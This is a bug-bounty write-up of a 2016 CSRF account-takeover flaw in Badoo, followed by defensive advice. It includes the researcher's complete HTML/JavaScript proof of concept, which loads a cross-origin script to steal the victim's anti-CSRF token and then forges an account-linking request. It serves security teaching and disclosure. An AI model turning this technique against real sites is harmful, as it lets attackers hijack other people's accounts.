Badoo full account takeover

On April 12th, 2016, the bug bounty hunter Mahmoud G. published a critical vulnerability in Badoo. Using a CSRF attack, it allowed an attacker to link an additional external account they controlled (for example a Google account) to any Badoo user's profile, and through that linked account take over the victim's Badoo account.

Mahmoud G. discovered the following request, which the browser sends when a user links a Gmail account to their Badoo profile:

https://eu1.badoo.com/google/verify.phtml?rt=<State_param_value>&code=<Code_returned_from_google>  

Unlike the previous vulnerabilities that have been reviewed, in this case the request carries an rt parameter that acts as an anti-CSRF token, so a blindly forged request fails. To obtain it, Mahmoud G. reviewed each request until they found the same value embedded in a .js file that the site serves to the logged-in user. It is included in the following line:

var url_stats = 'https://eu1.badoo.com/chrome-push-stats?ws=1&rt=<rt_param_value>'; 

Because a script loaded with a <script src> tag is fetched with the victim's cookies even from another origin, and any global variable it defines is readable by the including page, that .js file hands the per-user token to any site the victim visits. With all the elements needed for the attack, Mahmoud G. wrote the following proof of concept to exploit the vulnerability:

<html> 
<head> 
<title>Badoo account take over</title> 
<!-- Cross-site include of Badoo's service-worker script: the victim's browser sends
     their Badoo cookies, so the script defines url_stats with the victim's rt token -->
<script src=https://eu1.badoo.com/worker-scope/chrome-service-worker.js?ws=1></script> 
</head> 
<body> 
<script> 
// url_stats looks like '...chrome-push-stats?ws=1&rt=<token>': splitting on '='
// gives ['...?ws', '1&rt', '<token>'], so index 2 is the token
function getCSRFcode(str) { 
    return str.split('=')[2]; 
} 
window.onload = function(){ 
var csrf_code = getCSRFcode(url_stats); 
// Forged linking request: attacker-supplied Google code plus the stolen rt token
var csrf_url = 'https://eu1.badoo.com/google/verify.phtml?code=4/nprfspM3yfn2SFUBear08KQaXo609JkArgoju1gZ6Pc&authuser=3&session_state=7cb85df679219ce71044666c7be3e037ff54b560..a810&prompt=none&rt='+ csrf_code; 
// Top-level navigation, so the victim's session cookie is sent with the request
window.location = csrf_url; 
}; 
</script> 
</body> 
</html> 

When a logged-in Badoo user opens this page, the browser first loads the service-worker script with the victim's cookies, which exposes the victim's rt token as a global variable; the page then redirects to the verify endpoint with a Google authorization code (one the attacker obtained for an account they control) and the stolen token. Badoo accepts the request as if the victim had linked the account themselves, and the attacker's external account is now attached to the victim's profile.

The tip you can extract from this vulnerability is that anti-CSRF tokens and other per-user secrets are only as safe as every place they appear: here the token was leaked not by the form that used it, but by a seemingly unimportant .js file. When testing, search every response (scripts, JSON, HTML, error pages) for the token value, and check whether any resource that contains it can be included cross-origin via a <script> tag or similar. A per-user secret must never be placed in a script that other origins can include; tokens belong in responses that cannot be read cross-site, such as JSON protected by an XSSI prefix or a custom-header requirement. Two further observations a practitioner would make: the state-changing action here was performed with a GET request, which is itself a weakness; and today's browsers default session cookies to SameSite=Lax, which withholds them from cross-site subresource loads (like this script include) and would have blunted the leak, though an explicit SameSite attribute, an Origin or Sec-Fetch-Site check on the server, and POST-only state changes are what actually fix the flaw.

If you want to read more about this bug, visit https://hackerone.com/reports/127703.